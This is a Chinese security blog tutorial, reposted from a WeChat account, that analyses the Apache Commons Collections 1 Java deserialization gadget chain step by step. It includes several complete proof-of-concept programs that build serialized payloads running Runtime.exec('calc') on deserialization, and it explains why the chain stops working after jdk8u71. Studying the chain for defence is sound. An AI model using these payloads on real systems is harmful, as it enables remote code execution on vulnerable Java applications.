JAVA反序列化之CommonCollections1利用链

admin 2022年7月8日09:11:43代码审计评论18 views17352字阅读57分50秒阅读模式

0x01前言

之前简单学习了JAVA反序列化和URLDNS这条利用链,讲过的基础就不再赘述了,今天来学习CommonCollections这条利用链。

0x02分析

由于这条链相对于URLDNS比较复杂,为了更容易理解,所以首先采用P牛精简后的一段DEMO来理解这条利用链:
DEMO1

 1package Commoncollections1;
2import org.apache.commons.collections.Transformer;
3import org.apache.commons.collections.functors.ChainedTransformer;
4import org.apache.commons.collections.functors.ConstantTransformer;
5import org.apache.commons.collections.functors.InvokerTransformer;
6import org.apache.commons.collections.map.TransformedMap;
7
8import java.lang.annotation.Retention;
9import java.lang.reflect.Constructor;
10import java.util.HashMap;
11import java.util.Map;
12
13class CommonCollections1 {
14    void main(String[] args) throws Exception {
15        Transformer[] transformers = new Transformer[]{
16                new ConstantTransformer(Runtime.getRuntime()),
17                new InvokerTransformer("exec"new Class[]{String.class},
18                        new Object[]
19                                {"calc"}),
20        };
21        Transformer transformerChain = new
22                ChainedTransformer(transformers);
23        Map innerMap = new HashMap();
24        Map outerMap = TransformedMap.decorate(innerMap, null,
25                transformerChain);
26        outerMap.put("test""xxxx");
27    }
28}

在windows环境中,运行以上代码会发现打开了计算器。如果是其他系统需要将calc换成想要执行的程序路径。
简单看看代码,通过参数来看,发现最后一句代码好像没什么用似的,删掉试试。
结果发现不能打开计算器了,这说明,最终触发执行代码的代码是最后一条。

TransformedMap类

outerMap对象是TransformedMap.decorate返回的,所以要先研究一下这个类是干嘛用的,首先看一下这个类的继承图:

JAVA反序列化之CommonCollections1利用链
图1


通过类名可以看出,这是一个Map的装饰类,对应设计模式的装饰器模式。目的是为了向一个现有的对象添加新的功能,同时又不改变其结构。这个类中对原始类的某些接口的功能进行了扩展。
跟进这个TransformedMap类看看实现:


1    public static Map decorate(Map map, Transformer keyTransformer, Transformer valueTransformer) {
2        return new TransformedMap(map, keyTransformer, valueTransformer);
3    protected TransformedMap(Map map, Transformer keyTransformer, Transformer valueTransformer) {
4        super(map);
5        this.keyTransformer = keyTransformer;
6        this.valueTransformer = valueTransformer;
7    }

可以看到,decorate中new了一个自身对象并返回,也就是调用了自己的构造函数,而构造函数调用了父类的构造函数,然后将两个Transformer类型的参数保存到了成员变量中。
继续看看这个类的put方法,为什么会执行代码:

 1    public Object put(Object key, Object value) {
2        key = this.transformKey(key);
3        value = this.transformValue(value);
4        return this.getMap().put(key, value);
5    }
6    protected Object transformKey(Object object) {
7        return this.keyTransformer == null?object:this.keyTransformer.transform(object);
8    }
9
10    protected Object transformValue(Object object) {
11        return this.valueTransformer == null?object:this.valueTransformer.transform(object);
12    }

可以看出,put方法首先调用了自己的transformKey方法和transformValue方法,然后调用了map的put方法。而transformKey和transformValue都是调用了我们开始传参进去的Transformer对象的transform方法。

ChainedTransformer类

仔细观察会发现,构造TransformedMap对象的时候,我们传参的Transformer类对象是一个transformerChain对象。

1Transformer transformerChain = new
2                ChainedTransformer(transformers);
3        Map innerMap = new HashMap();
4        Map outerMap = TransformedMap.decorate(innerMap, null,
5                transformerChain);

首先看一下继承图:

JAVA反序列化之CommonCollections1利用链
图2

可以看出transformerChain类是Transformer的子类,根据构造这个类的代码可以看出,这个类构造参数是一个Transformer数组,看一下实现代码:

1    public ChainedTransformer(Transformer[] transformers) {
2        this.iTransformers = transformers;
3    }
4
5    public Object transform(Object object) {
6        for(int i = 0; i < this.iTransformers.length; ++i) {
7            object = this.iTransformers[i].transform(object);
8        }

可以看到,构造函数直接将传入的参数保存在iTransformers成员变量中。而transform方法的实现则是循环调用数组中每一个元素的transform方法,并且将前一个调用的结果当做下一个调用的参数传入。

Transformer 接口

接下来继续往上看代码,看到定义了一个Transformer对象数组,对象分别是继承自Transformer的ConstantTransformer子类和InvokerTransformer子类。
查看Transformer的定义,发现是一个接口,并且只有一个方法:

1public interface Transformer {
2    Object transform(Object var1);
3}

然后去这两个类中看一下这个接口是如何实现的:

ConstantTransformer 类

1    public ConstantTransformer(Object constantToReturn) {
2        this.iConstant = constantToReturn;
3    }
4
5    public Object transform(Object input) {
6        return this.iConstant;
7    }

可以看到,ConstantTransformer这个类的构造函数将参数保存到类成员变量iConstant 中,然后transform接口将iConstant返回。

InvokerTransformer 类

 1    public InvokerTransformer(String methodName, Class[] paramTypes, Object[] args) {
2        this.iMethodName = methodName;
3        this.iParamTypes = paramTypes;
4        this.iArgs = args;
5    }
6
7    public Object transform(Object input) {
8        if(input == null) {
9            return null;
10        } else {
11            try {
12                Class ex = input.getClass();
13                Method method = ex.getMethod(this.iMethodName, this.iParamTypes);
14                return method.invoke(input, this.iArgs);
15            } catch (NoSuchMethodException var4) {
16                throw new FunctorException("InvokerTransformer: The method '" + this.iMethodName + "' on '" + input.getClass() + "' does not exist");
17            } catch (IllegalAccessException var5) {
18                throw new FunctorException("InvokerTransformer: The method '" + this.iMethodName + "' on '" + input.getClass() + "' cannot be accessed");
19            } catch (InvocationTargetException var6) {
20                throw new FunctorException("InvokerTransformer: The method '" + this.iMethodName + "' on '" + input.getClass() + "' threw an exception", var6);
21            }
22        }
23    }

注意InvokerTransformer类的构造参数,分别是想要调用的方法名,参数的类型数组,以及参数数组。
构造方法中只是将这几个参数保存到了成员变量中,然后在transform方法中,通过传入的对象用反射调用的方式调用构造函数中传入的方法。

调用链总结

看到这里,是否有一种豁然开朗的感觉?
接下来对这一段Demo进行一个调用链总结:

1TransformedMap.put
2ChainedTransformer.transform
3ChainedTransformer.transformValue
4ChainedTransformer.transform
5ConstantTransformer.transform
6InvokerTransformer.transform
7Runtime.exec

到这里相信大家对上面的Demo原理已经了解了,但是现在有一个问题,我们在本机执行是可以执行代码了,但是怎么反序列化漏洞中来利用这个利用链呢?
通过上面的调用链总结可以看出,这一套调用链主要是围绕着Transformer接口的transform方法的,所以说要找到一个在readObject方法中能调用transform方法的地方。

AnnotationInvocationHandler类

AnnotationInvocationHandler类就是满足上面要求的一个类,首先我们来看一下这个类的构造函数:

1    AnnotationInvocationHandler(Class<? extends Annotation> var1, Map<String, Object> var2) {
2        Class[] var3 = var1.getInterfaces();
3        if(var1.isAnnotation() && var3.length == 1 && var3[0] == Annotation.class) {
4            this.type = var1;
5            this.memberValues = var2;
6        } else {
7            throw new AnnotationFormatError("Attempt to create proxy for a non-annotation type.");
8        }
9    }

可以看到构造函数有两个参数,第一个参数是继承自Annotation的类的Class对象,第二个参数是一个Map。
将参数1保存在了type变量中,将参数2保存在了memberValues变量中。
接下来看一下readObject方法:

 1    private void readObject(ObjectInputStream var1) throws IOException, ClassNotFoundException {
2        var1.defaultReadObject();
3        AnnotationType var2 = null;
4
5        try {
6            var2 = AnnotationType.getInstance(this.type);
7        } catch (IllegalArgumentException var9) {
8            throw new InvalidObjectException("Non-annotation type in annotation serial stream");
9        }
10
11        Map var3 = var2.memberTypes();
12        Iterator var4 = this.memberValues.entrySet().iterator();
13
14        while(var4.hasNext()) {
15            Entry var5 = (Entry)var4.next();
16            String var6 = (String)var5.getKey();
17            Class var7 = (Class)var3.get(var6);
18            if(var7 != null) {
19                Object var8 = var5.getValue();
20                if(!var7.isInstance(var8) && !(var8 instanceof ExceptionProxy)) {
21                    var5.setValue((new AnnotationTypeMismatchExceptionProxy(var8.getClass() + "[" + var8 + "]")).setMember((Method)var2.members().get(var6)));
22                }
23            }
24        }
25
26    }

重点主要在这一部分:

JAVA反序列化之CommonCollections1利用链
图3


通过上面的构造函数可以看出,memberValues保存的就是我们需要传入的Map对象,这里调用了Map.entrySet(),entrySet方法会返回一个Set集合,然后通过iterator获取一个迭代器遍历这个集合。集合中的数据就是一个Entry,Entry中是我们的键值对。
然后在调用Entry.setValue来设置数据。
所以这里要看一下setValue是怎么实现的,直接在IDEA里go to declaration发现是map接口中定义的,所以要在实现类中去找。
我们传入的类是TransformedMap类型的,所以就去TransformedMap找setValue方法。
但是发现TransformedMap类中没有setValue方法,接着去TransformedMap的父类AbstractInputCheckedMapDecorator找。在这里发现如下代码:

JAVA反序列化之CommonCollections1利用链
图4


可以看到setValue在AbstractInputCheckedMapDecorator.MapEntry中定义。setValue调用了parent.checkSetValue方法。而parent通过上面的构造函数可以看到是一个父类对象,所以我们去看一下TransformedMap类中是否有checkSetValue方法:


1    protected Object checkSetValue(Object value) {
2        return this.valueTransformer.transform(value);
3    }

可以看到TransformedMap类中定义了checkSetValue方法,而checkSetValue方法调用了valueTransformer.transform方法。这就和我们之前执行的put一个效果了,可以直接触发我们精心构造的利用链。
这里有点绕,如果对这一块不明白可以自己调试一下看看。

尝试构造新的POC

了解了AnnotationInvocationHandler类之后,我们用刚才的TransformedMap对象构造一个AnnotationInvocationHandler对象,然后序列化AnnotationInvocationHandler对象,这时候会发现报错了,原因是Runtime对象无法序列化,因为没实现Serializable接口,所以这时候要通过反射调用,更改后的代码如下:

 1package Commoncollections1;
2import org.apache.commons.collections.Transformer;
3import org.apache.commons.collections.functors.ChainedTransformer;
4import org.apache.commons.collections.functors.ConstantTransformer;
5import org.apache.commons.collections.functors.InvokerTransformer;
6import org.apache.commons.collections.map.TransformedMap;
7import java.io.ByteArrayInputStream;
8import java.io.ByteArrayOutputStream;
9import java.io.ObjectInputStream;
10import java.io.ObjectOutputStream;
11import java.lang.annotation.Retention;
12import java.lang.reflect.Constructor;
13import java.lang.reflect.InvocationHandler;
14import java.util.HashMap;
15import java.util.Map;
16public class DEMO2 {
17    public static void main(String[] args) throws Exception {
18        Transformer[] transformers = new Transformer[]{
19                new ConstantTransformer(Runtime.class),
20                new InvokerTransformer("getMethod"new Class[]{
21                        String.class,
22                        Class[].class}, new Object[]{"getRuntime",
23                        new Class[0]}),
24                new InvokerTransformer("invoke"new Class[]{Object.class,
25                        Object[].class}, new Object[]{nullnew Object[0]
26                }),
27                new InvokerTransformer("exec"new Class[]{String.class},
28                        new String[]{
29                                "calc"}),
30        };
31        Transformer transformerChain = new ChainedTransformer(transformers);
32        Map innerMap = new HashMap();
33        innerMap.put("value""xxxx");
34        Map outerMap = TransformedMap.decorate(innerMap, null,
35                transformerChain);
36        Class clazz =
37                Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
38        Constructor construct = clazz.getDeclaredConstructor(Class.class,
39                Map.class);
40        construct.setAccessible(true);
41        InvocationHandler handler = (InvocationHandler)
42                construct.newInstance(Retention.class, outerMap);
43        ByteArrayOutputStream barr = new ByteArrayOutputStream();
44        ObjectOutputStream oos = new ObjectOutputStream(barr);
45        oos.writeObject(handler);
46        oos.close();
47        System.out.println(barr);
48        ObjectInputStream ois = new ObjectInputStream(new
49                ByteArrayInputStream(barr.toByteArray()));
50        Object o = (Object) ois.readObject();
51    }
52}

运行代码发现没有报错,但是并没有打开计算器。这是因为什么呢?
以下涉及到JAVA注解方面知识,这里只进行简单分析,详细过程可以参考- https://xz.aliyun.com/t/7031#toc-8
通过调试发现,在AnnotationInvocationHandler类反序列化过程中,有这么一个判断:

JAVA反序列化之CommonCollections1利用链
图5


如果var7等于null,则不会执行下面的代码也就不会执行我们精心构造的利用链。
通过代码可以看出,var7是var3.get(var6)得到的,var6是我们传入的key,通过调试发现,var3详细信息如下:

JAVA反序列化之CommonCollections1利用链
图6


可以看出var3中包含了一个Hashmap$Node的元素,这个元素的key值是value,而我们传入的key值是test,所以这里应该要改为value值。


最终POC

经过上面的分析,将代码中我们传入的key值改为value在试:

 1package Commoncollections1;
2
3import com.sun.xml.internal.messaging.saaj.util.ByteInputStream;
4import com.sun.xml.internal.messaging.saaj.util.ByteOutputStream;
5import org.apache.commons.collections.Transformer;
6import org.apache.commons.collections.functors.ChainedTransformer;
7import org.apache.commons.collections.functors.ConstantTransformer;
8import org.apache.commons.collections.functors.InvokerTransformer;
9import org.apache.commons.collections.map.TransformedMap;
10
11import java.io.ObjectInputStream;
12import java.io.ObjectOutputStream;
13import java.lang.annotation.Retention;
14import java.lang.reflect.Constructor;
15import java.util.HashMap;
16import java.util.Map;
17
18/**
19 * Created by King on 2022/1/12.
20 */

21public class DEMO3 {
22    public static void main(String[] args) throws Exception {
23        Transformer[] transformers = new Transformer[]{
24                new ConstantTransformer(Runtime.class),
25                new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",new Class[0]}),
26                new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,new Object[0]}),
27                new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"}),
28        };
29
30        Transformer transformerChain = new
31                ChainedTransformer(transformers);
32        Map innerMap = new HashMap();
33        innerMap.put("value""xxxx");
34        Map outerMap = TransformedMap.decorate(innerMap, null,
35                transformerChain);
36
37        Class cls = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
38        Constructor construction = cls.getDeclaredConstructor(Class.class,Map.class);
39        construction.setAccessible(true);
40        Object nob = construction.newInstance(Retention.class,outerMap);
41        ByteOutputStream bo = new ByteOutputStream();
42        ObjectOutputStream op = new ObjectOutputStream(bo);
43        op.writeObject(nob);
44        System.out.println(bo);
45        ObjectInputStream or = new ObjectInputStream(new ByteInputStream(bo.getBytes(),bo.size()));
46        Object readOb = or.readObject();
47    }
48}

运行代码,可以看到成功打开计算器:

JAVA反序列化之CommonCollections1利用链
图7

真正的CC1链

上面分析了这么多,其实这并不是真正的CC1利用链,真正的CC1如下:

JAVA反序列化之CommonCollections1利用链
图8


可以看到,ysoserial中没有用TransformedMap,而是用的LazyMap类,查看该类定义,找一下在哪里调用了transform:

JAVA反序列化之CommonCollections1利用链
图9


发现在该类中的get方法调用了transfrom方法,也就是说这个类通过get来触发我们构造的利用链。
但是如何让AnnotationInvocationHandler类调用get方法呢?看看AnnotationInvocationHandler的定义,发现在invoke方法中调用了get方法:

JAVA反序列化之CommonCollections1利用链
图10


那么如何让AnnotationInvocationHandler类在反序列化的过程中调用get方法呢?


动态代理

答案就是java动态代理,通过动态代理可以很方便的拦截对某个对象的某个方法的调用进行拦截。
比如有如下接口:

 1interface testFace{
2    public void print();
3    public void Get();
4    public void put();
5}
6class testClas implements testFace{
7    public void print(){System.out.println("print runing");}
8    public void Get(){System.out.println("Get runing");}
9    public void put(){System.out.println("put runing");}
10}

我想对这个接口中的某个方法调用进行拦截,可以通过动态代理的方式来实现。

 1class testProxyInvoke implements InvocationHandler{
2    private testFace ob = null;
3    public testProxyInvoke(testFace ob)
4    
{
5        this.ob = ob;
6    }
7    public Object invoke(Object proxy, Method method, Object[] args) throws Throwable{
8        System.out.print("attempt call "+method.getName());
9        if(method.getName().equals("print"))
10        {
11            this.ob.put();
12        }
13        return (Object)null;
14    }
15    public testFace getOb()
16    
{
17        return this.ob;
18    }
19}

InvocationHandler接口是一个调用处理器的接口,如何相对指定对象进行代理,通过实现这个接口定义invoke接口,然后创建一个代理后,所有对指定对象的调用都会首先调用invoke方法。
完整代码如下:

JAVA反序列化之CommonCollections1利用链
图11


可以看到,我们只是调用了print方法,但是最终却调用了put方法。这就是因为在invoke方法中做的处理。


完整CC1利用链

为了方便调试,参考cc1链在本地写了一份,代码如下:

 1    public static void main(String[] args) throws Exception
2    
{
3        Transformer[] transformers = new Transformer[]{
4                new ConstantTransformer(Runtime.class),
5                new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",new Class[0]}),
6                new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,new Object[0]}),
7                new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"}),
8        };
9
10        Transformer transformerChain = new
11                ChainedTransformer(new Transformer[]{new ConstantTransformer(1)});
12        Map innerMap = new HashMap();
13        Map outerMap = LazyMap.decorate(innerMap,transformerChain);
14
15        Class cls = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
16        Constructor construction = cls.getDeclaredConstructor(Class.class,Map.class);
17        construction.setAccessible(true);
18        Object nob = construction.newInstance(Retention.class,outerMap);
19        Object handler = Proxy.newProxyInstance(Map.class.getClassLoader(),new Class[]{Map.class},(InvocationHandler) nob);
20        Object fob = construction.newInstance(Retention.class,handler);
21
22        Class Chained = Class.forName("org.apache.commons.collections.functors.ChainedTransformer");
23
24        Field fd =  Chained.getDeclaredField("iTransformers");
25        fd.setAccessible(true);
26        fd.set(transformerChain,transformers);
27        ByteOutputStream bo = new ByteOutputStream();
28        ObjectOutputStream op = new ObjectOutputStream(bo);
29        op.writeObject(fob);
30        System.out.println(bo);
31        ObjectInputStream or = new ObjectInputStream(new ByteInputStream(bo.getBytes(),bo.size()));
32        Object readOb = or.readObject();

运行代码,会发现弹出了计算器。

jdk8u71之后为什么不行

不管是P牛的思路还是真正的CC1链,在jdk8u71之后都无法使用,至于为什么可以看下图新老版本对比,左边为老版本右边为新版本:

JAVA反序列化之CommonCollections1利用链
图12


可以看到在新版jdk中,反序列化不再通过defaultReadObject方式,而是通过readFields 来获取几个特定的属性,这两种方式有什么区别呢,经过我自己多次调试发现defaultReadObject 可以恢复对象本身的类属性,比如this.memberValues 就能恢复成我们原本设置的恶意类,但通过readFields方式,this.memberValues 就为null,所以后续执行get()就必然没发触发,这也就是高版本不能使用的原因,网上大多会说是因为取消了SetValue导致不能触发,但其实不然,思路一确实是因为这个原因,但CC1和取消setValue没有半毛钱关系。


0x03总结

整篇文章总体思路是跟着P牛的文章思路来的,只不过因为基础薄弱很多地方都详细分析了一遍。分析完之后感慨大佬是怎么从那么多的代码中找到这样一条可以利用的调用链的,真的很巧妙。

0x04参考

[1]代码审计星球 JAVA安全漫谈9 10 11
[2]https://www.cnblogs.com/9eek/p/15050035.html


原文始发于微信公众号(猎户攻防实验室):JAVA反序列化之CommonCollections1利用链

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年7月8日09:11:43
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  JAVA反序列化之CommonCollections1利用链 http://cn-sec.com/archives/1165748.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: